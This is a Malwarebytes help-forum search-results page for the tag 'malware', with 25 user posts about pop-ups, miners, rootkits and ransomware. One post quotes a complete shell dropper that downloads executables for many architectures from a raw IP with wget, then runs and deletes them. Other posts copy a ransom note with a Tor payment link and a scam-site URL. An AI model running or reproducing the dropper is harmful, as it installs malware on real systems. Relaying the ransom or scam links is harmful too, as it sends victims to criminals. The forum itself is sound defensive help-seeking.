Jump to content

Search the Community

Showing results for tags 'malware'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Announcements
    • Malwarebytes News
    • Beta Testing Program
  • Malware Removal Help
    • Windows Malware Removal Help & Support
    • Mac Malware Removal Help & Support
    • Mobile Malware Removal Help & Support
    • Malware Removal Self-Help Guides
  • Malwarebytes for Home Support
    • Malwarebytes 3 Support Forum
    • Malwarebytes for Mac Support Forum
    • Malwarebytes for Android Support Forum
    • Malwarebytes for iOS Support
    • False Positives
    • Comments and Suggestions
  • Malwarebytes for Business Support
    • Malwarebytes Endpoint Protection
    • Malwarebytes Incident Response (includes Breach Remediation)
    • Malwarebytes Endpoint Security
    • Malwarebytes Business Products Comments and Suggestions
  • Malwarebytes Tools and Other Products
    • Malwarebytes AdwCleaner
    • Malwarebytes Junkware Removal Tool Support
    • Malwarebytes Anti-Rootkit BETA Support
    • Malwarebytes Techbench USB (Legacy)
    • Malwarebytes Secure Backup discontinued
    • Other Tools
    • Malwarebytes Tools Comments and Suggestions
  • General Computer Help and Security Updates
    • BSOD, Crashes, Kernel Debugging
    • General Windows PC Help
  • Research Center
    • Newest Rogue-Ransomware Threats
    • Newest Malware Threats
    • Newest Mobile Threats
    • Newest IP or URL Threats
    • Newest Mac Threats
    • Report Scam Phone Numbers
  • General
    • General Chat
    • Forums Announcements & Feedback

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Location


Interests

Found 381 results

  1. Hey there, I am Vicenç, a Spanish student in KTH Stockholm trying to finish my MSc degree. Recently, my laptop (Acer TravelMate P) has slowed down a lot. When investigating it, the performance of my CPU is questionable. When I launch internet browsers, the CPU usage spikes. In addition, my task administrator reveals processes I have no idea how they got there. After googling most of them, they are normal processes, it is just they take much RAM and CPU usage. More than one would normally expect. I noticed as well the creation of random folders with the name of '!EndpointProtectionFolderDo NotDiscard' in Files, Images, Videos and Music, when I never installed Sandblast software. The images are like this: I ran several antimalware programs in safe mode, but none of them detected any infection. The usage of memory is really strange and it is making me worried. I hope some of you can help, I would profoundly appreciate. As someone who relies heavily on his PC, 2 weeks without a laptop would be terrible. I remain at your disposal. Best, Vicenç
  2. I was using Yahoo mail in Mozilla Firefox when a warning popped up saying, "Your Windows 10 is infected with 3 viruses" The link in the address bar changed to: https://www.mscheck002.club/sk/fa9ff2ca/us/?clid=c45693d5bc364beb8cffa6e9f15eff8d9ca7&p1=74070&p2=&pre_tpl=6 Is this malware? The last time it happened I ran Malwarebytes and found nothing. Thanks
  3. Hello, I'm puzzled by the fact that I keep getting random notices that Malwarebytes has blocked an attempt to connect to members.chello.nl, which is supposedly a site infected by ransomware. I'm glad that Malwarebytes is blocking these attempts. My question is, Why is my computer making these attempts? I have never used that site. I am not trying to open that site. There seems to be some automatic process that is initiating these attempts. I assume it is some kind of malware. How do I find it and get rid of it? I've run a full Malwarebytes Premium scan, which showed zero threats. I've also run an AdwCleaner scan, with no threats detected. Thanks for any advice! Lance
  4. Hi Team, Hope this finds you well. I am struggling with a virus: ”PUP.Optional.Legacy”. Initially, this virus was showing up in my malware scan. I ran through a few procedures, and now it doesn't. However, it is still showing up in my adware scan. I keep going through "clean & repair," but it does not remove the PUP. I've attached my scan logs for your review. Can you please assist with the next steps?? Kindest, Maurice AdwCleaner[S02].txt Malware scan report.txt FRST.txt Addition.txt
  5. I am also having the same issue. I have run all the tools to no avail. I have attached the requested files. Obviously, I don't want to just ignore the messages, I want to actually delete the adware or whatever it is. Help please. Thanks. FRST.txt Addition.txt
  6. Hello everyone, I just read this article and got a little worried: https://www.howtogeek.com/fyi/bing-is-pushing-malware-when-you-search-for-chrome/ I have three quick questions that I hope someone could help me with: 1. If you actually run that phony installer, will it still act as the official installer? As in everything will act normally but you actually have a hidden malware in your Chrome? 2. If I installed Chrome a while ago, how can I check that my installation is genuine and not a fake Google Chrome? I don' have the installer anymore. 3. Would a Malwarebytes scan detect a bad installation? I ran a scan and it didn't find anything. Thank you and have an awesome day!
  7. Posted Yesterday, 01:59 PM I'm a completely novice computer user. Recently, I have been having some malware issues on my PC which is Windows 10. I already have an antivirus, Quick Heal Total Security, and recently, it detected a Coinhive mining malware on my computer, plus, it keeps showing pop up windows that it has blocked access to multiple harmful websites even when I'm accessing reliable websites like Amazon and others. I researched a bit on the Coinhive virus and found out some serious things, and so I'm currently scanning my computer for all kinds of malware, spyware, adware, rootkits using a variety of tools just to be safe. I know I'm being paranoid, but better be paranoid than have my personal data compromised. So far, I've used Malwarebytes to run a full system scan, TDSSKiller for rootkits, and a full system scan by my installed antivirus. All three of them came up clean after that one Coinhive virus was removed. I'm also planning to use more scanners like AdW, ESET, Rkill, as many as I have found to be on the safe side. Now, I started running a scan with GMER for rootkits today, in safe mode, however, the first time, mid-scan, the window just disappeared off the screen. I ran it a second time, and it only showed two entries in the log list before a message was displayed that my system had run into an error and needed to restart. I booted the computer into safe mode once again and started GMER for the third time, and same thing happened. Two logs, then mid-scan, same error message and restart. So, now I'm thinking I do have a rootkit that is stopping GMER from running a scan. I really don't know what to do right now. I also know that GMER is supposed to be for advanced users only, but my plan was to just get the results, save them and then show them to an expert, either here or if not possible, then to someone I know. However, given the fact that the scan won't even get halfway through, I don't know what to do. Would be grateful if someone could point me in the right direction. GMER not being able to complete the scan does mean that I have some kind of rootkit stopping it from working, right? Or could there be any other reasons for that? Thank you very much. P.S. I know I need to backup my data before I run any tools recommended by experts here, but I'm actually worried about infecting my backup as well. As I have already mentioned before, my computer was infected by a coinhive mining virus before, and even though it's removed now, I haven't deleted any old system restore points or registry files so it's possible the virus still persists. Plus, since my computer may have other kinds of malware right now including rootkits, if I try to back up my data now, isn't there a good possibility that I'm also infecting my back up? I back up all my data on an external hard drive, and they are even more susceptible to infection, just by plugging it in to my computer right now could transmit the malware. So, if in the end of the malware removal process, I lose some of my data and have to restore it from my backup, am I facing a chance of re-infection and also damage to my external hard drive? If so, then could you please suggest a safe way to backup all of my data? My data does not contain any applications or program files, it's only composed of documents, videos, music and images which are all stored in D and E drives, I'm not going to be backing up anything from C drive. Is there no way to safely backup, or backup in a way so that when I restore it back on the clean PC, it does not reinfect? Because I currently have some important files on my computer that I can't lose, I know there is no 100% guaranteed way that if I backup it won't be infected, but how should I reduce the risks? I don't want to lose any files by running scans with the anti-malware tools, so please point me in the right direction of backing up my files relatively safely before I can use the suggested tools and post the logs. Please suggest a safe backup method so I can proceed with the removal process.
  8. I'm currently using Malwarebytes for PC and Android Phone, Few days ago while Scanning my Android Phone , Malwarebytes just detected a Malware the malware name is Android/PUP.Riskware.Autoins.Fota I just wanna ask if this malware is dangerous and what the virus can do to me and my phone. I search the virus name in google but the result is nothing. Hoping to get an answer.
  9. Hi, So the other day I decided to start using avg again instead of bit defender, downloaded avg and it took around 3 hours to "install", eventually I canceled this and immediately got "recycle bin is corrupted" message. I then tried to run Malwarebytes but got told I didn't have permission to use my D drive ( pc has SSD C drive with windows and D drive HDD for data). My account is definitely the admin. After some digging, I managed to boot in safe mode get Malwarebytes running on my c drive and deleted the contents of the recycle bin and all downloaded files within the last 2 weeks. However, I still don't have access to delete or edit files on my D drive so can only assume its still lurking in my files. Could anyone help? I will post my FRST file when I get back home.
  10. For the past few days, the Firefox browser on my PC has been opening up to the Microsoft or Google homepage, despite it being set to Firefox home. Changing the homepage to something else doesn't seem to work, although new tabs aren't affected. This prompted me to look in my NoScript extension, where I briefly noticed something along the lines of "cdn.immereeako". I looked it up and found a very detailed article about some "iTranslator" malware. It mentions the same browser redirect that I've experienced, as well as a folder in my (C:\ProgramData) that was created on the 22nd of this month. Unfortunately, McAfee, Spybot Search & Destroy and Malwarebytes have been unable to get rid of the issue, so I'm pretty stumped on getting rid of this thing. Addition.txt FRST.txt Malwarebytes threat scan.txt
  11. I have the same problem--smartlink.cool--but I do not want to "silence" the warning, I want to find and remove the offending source. I have performed all the steps in the post by miekiemoes but the problem remains. I also ran AdwCleaner to no avail. What can I do?
  12. The night of the 17th, I was using the Facebook app while suddenly a download in progress icon appeared in the status bar. I pulled down the notifications screen just in time to catch a glimpse of the word "attackers" followed by a bunch of symbols like $ before it disappeared. I could not find anything in the downloads folder list, ESET premium that was monitoring my phone and all downloads hadn't even detected it, and I tried in vain to search online using only the selected phrases I had managed to glimpse. Then by sheer luck, today, I managed to find a thread on this problem with the full details. The message had been "attackers on <b>%1$s</b> might atte..." with a download in progress while using Facebook app. Which I assume is completed as "might attempt to steal your information" or something. I tried using this phrase to search about it on Google, and while nothing specific to this problem came up, a list of generic information results on various types of network attacks, DDos, man in the middle and zero day attacks came up, which has me really worried. I am still using the phone as is, I really don't know much about technology related things. Please advise me what I should do now, if I should just turn off the phone or something. The person in the other thread said he had reset his phone and the problem had reappeared when he had signed into Facebook again, so now I'm not sure if a simple factory reset will help and I will probably need to install a custom ROM or something. I'm using Android 7.0 in a Samsung Galaxy J7 Prime. I got a software update to Oreo just an hour earlier and I wonder if updating the software will help remove whatever malware/spyware/hacking application got installed. Please help, I am logged into all my accounts through this phone and it's already been like 4 days since the message first appeared damage control is needed. Thank you very much. If you know anything, anything, please let me know it's very urgent.
  13. I have ADS X malware installed, and unable to delete it. Each time I search for anything I get several extra responses at the top of the result lists, and a small almost imperceprtible "ADS X" text at the right where I can close that irrelevant results, but still the listing has several bad responses. MALWAREBYTES was unable to remove that ADS X , Malwarebytes is not aware of it existence. REIMAGE CLEANER detects the malware but I don't want to pay them for the removal. Why Malwarebytes is not detecting it but others do? ....
  14. I have noticed that all of the tech-support scammers use GoToAssist to control people’s PC’s. Does any legitimate company use this software? Is there any prospect on getting this classified as a potentially unwanted program or something?
  15. Hello people of the malwarebytes forums. I'm a new linux user and I've ran into this bins.sh from a site. I don't really know what it does. So if someone could shed some light on it would be greatly appreciated #!/bin/bash cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mips; chmod +x sirius.mips; ./sirius.mips; rm -rf sirius.mips cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.mpsl; chmod +x sirius.mpsl; ./sirius.mpsl; rm -rf sirius.mpsl cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.sh4; chmod +x sirius.sh4; ./sirius.sh4; rm -rf sirius.sh4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.x86; chmod +x sirius.x86; ./sirius.x86; rm -rf sirius.x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm6; chmod +x sirius.arm6; ./sirius.arm6; rm -rf sirius.arm6 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.x32; chmod +x sirius.x32; ./sirius.x32; rm -rf sirius.x32 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.ppc; chmod +x sirius.ppc; ./sirius.ppc; rm -rf sirius.ppc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.i586; chmod +x sirius.i586; ./sirius.i586; rm -rf sirius.i586 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.m68k; chmod +x sirius.m68k; ./sirius.m68k; rm -rf sirius.m68k cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.ppc; chmod +x sirius.ppc; ./sirius.ppc; rm -rf sirius.ppc cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm4; chmod +x sirius.arm4; ./sirius.arm4; rm -rf sirius.arm4 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://93.123.73.10/sirius.arm5; chmod +x sirius.arm5; ./sirius.arm5; rm -rf sirius.arm5 Also don't know if this is in the right section or not so please move it if It's not.
  16. Recently been attacked, all my files have now changed to ,pptx type, no matter what type of file is on my system audio video exe all are changed to powerpoint file type i have tried almost every tool for decryption but no use, also identification methods online cant identify it as well i need help cuz all my data is very important to me and cant access it any news for the same attack or any progress in decrypting it will a help hope this gets over soon here is the message present in every folder in a text document: Your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. Open this link In the "Tor Browser" http://huhighwfn4jihtlz.onion/sdlsgdewwbhr Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ You unique ID so n so ( a very long id)
  17. Hi I have the same problem with my desktop computer. All my files were changed to .PPTX. I need someone willing to help please. All the encrypted file are too important. I can't just delete them. Here's the same note they left. Your files are Encrypted! For data recovery needs decryptor. How to buy decryptor: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. Open this link In the "Tor Browser" http://huhighwfn4jihtlz.onion/sdlsgdewwbhr Note! This link is available via "Tor Browser" only. ------------------------------------------------------------ Free decryption as guarantee. Before paying you can send us 2 file for free decryption. ------------------------------------------------------------ You unique ID 6C 6D 88 01 C4 55 06 B2 F8 17 13 E4 BC 98 AA FB 02 11 FD 90 2D EE 08 6E AF 32 E5 20 3C 52 16 F8 B6 9B 0B 12 35 53 14 DF FF 71 F4 BF B9 6B A9 90 7B 4B 3E B8 84 C8 B5 D0 3C 93 24 FE 27 EB 93 49 7D A1 CE 39 28 57 34 B4 CB 5D F3 EB 39 80 FB 31 9E FA CD 54 0A 43 D9 05 0C B5 01 0E 50 84 6F 6A 10 51 2D 47 06 D5 C7 F2 EC 8F AD D8 06 FC FE 8D BE 5A BF 25 36 94 22 F7 45 9F 8C 9B F3 CC 0D 89 99 D3 94 14 4D AA F2 23 53 9E 6F A3 15 E6 89 2D C6 84 E0 95 2E D2 7E 05 56 06 08 93 C7 6B A1 FC 99 ED D7 45 8F 3F DC F9 B7 61 9D F9 D2 01 B8 E5 74 39 2E 86 00 AE C7 9A 3A 83 40 33 6F 80 20 2C 8A 69 8C 9C 06 57 A2 CB 1B 02 A1 65 8F 1E CD 5C C5 1F 0A E8 EE 8B 85 6A AB 15 C4 16 AE 68 AD 18 FA 13 7A B8 4A 4B 3D CA 28 EA 5E D7 91 93 FE 80 5D 8F 35 50 EE CE C5 B7 AE 63 34 6E EF 8F 7F A8
  18. Please help me. I have this problem too, all my files changed to .pptx. Here to find the alternatives. Thanks.
  19. HI Everyone, I installed a file on my WIN 10 machine today. After installing it is not opening , and when trying to delete it from Control Panel I get an error runtime error could not call proc (at 399:4752).. Can someone please help>???
  20. I keep getting popups from MalwareBytes saying it's blocked smartlink.cool - which is nice - but it would be good to be able to say: "Just block this, log it, but don't bother telling me every time."
  21. I am running Windows 10 Home on a HP machine. I suspect that my machine has become infected in the recent past and I want to clean up the malware, either by a number of removal tools or by formatting. Before doing that, I need to back up my important data, but I don't want to back up any infected files as I will be restoring them after the malware removal process is done. Now, I only have this one machine, the possibly infected one, and an external HDD that I back up my data to. But I don't want my external HDD to get infected too when I plug it in via USB cable. Is there a relatively safer way to back up my recent data to my HDD from my infected computer? At this point, I'm considering using either a Live CD/USB to boot the computer and then copy my documents, photos, videos etc to my external HDD, or back up to a cloud storage. Which of these two options will be better and safer? I have around 250 gb of data on my hard drive, so please suggest a safe backup method accordingly. ALSO, I have read on online forums that I should refrain from backing up certain file formats like .exe, .ini, .xml etc. While I know what the executable and autorun file formats are and won't be backing them up, I do not understand what script files like .php and .xml are and which kinds of files are supposed to have them. Do normal word documents (.docx), picture, video and audio file formats have any script files attached to them that I may need to worry about? Any help and suggestions will be truly appreciated as I need it urgently. Thanks in advance.
  22. Greetings all, I have tried deleting the quarantined files, I have also ran Adwcleaner on the most updated version and rebooted multiple times and it still appears in my new scans. I have checked my processes to look for anything out of the ordinary, I looked inside all of my HKEY folders to see if I could find anything in there or in System32, I also checked to see if there were any outside IPs connected in my hosts and there was not. Please help me in deleting this from my PC.
  23. Hi guys, I'll keep my story short. I think my PC is being remotely controlled and infected with Trojans malware ransomware ect... what makes me feel like that? Well my certificates, credentials, passwords, user rights and much more being changed/blocked/deleted. I had to exchange my comcast router, I had a technician coming to my house to do a checkup he found my outside Xfinity box open and the cables were played with. He installed a moca point of entry adapter just in case im a victim of w man of the middle or evil twin attack. I installed ExpressVPN, brand new bitdefender 2019 top security software, changed my security settings within my router to basically max security. Blocked mac addresses... I Recovered my own laptop for the 10th time but somehow someone or something keeps getting access to my laptop. I have extremely high data consumption at night while I sleep even tho my PC is shut down before I go to sleep. Current status I disabled my wifi adapter within bios and am plugged into ethernet. My antivirus and VPN are broken because they don't work anymore, I can't deinstall certain software anymore like malwarebytes for example.I have weird background tasks running. There is unknown root kit certificates installed by root agency and lots and lots of other stuff happening... I am attaching some pictures for you that looked suspicious to me. I am writing this from my galaxy so which also has a VPN on it because my phone started to act strange. Please, I need an expert like you folks to look into this and tell me what's going on. Much appreciated.
  24. So I've been having this problem for the last few days, my PC was pretty slow so I ran malwarebytes and it found a lot of stuff, then got rid of it but they came back with every reboot so I started looking into solutions online, I guess I've managed to get rid of a few of them by running a lot of different cleaning tools but "conhost.exe" always comes back after reboot. There was also some exes called lsmose and mysa1 mysa2 and mysa3 which I found out online that are bitcoin miners. I can stop the conhost manually by stopping some processes but it comes back after every reboot so I would really appreciate some help. I already ran FRST and attached the files, also not sure if this changes anything but these are the cleaning tools I used: malwarebytes, hitmanpro, roguekiller, mbamantirootkit and combofix FRST.txt Addition.txt
  25. Hello you guys, I'm a student. When I study malware, I wonder how we can detect a file that was infected? I google and then knowing that, AV, and some sandboxs detect malware through hash256. Howerver, I can not understand how it works. Please help me know, how we can hash a file then compare with hash database? Thanks for reading!
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.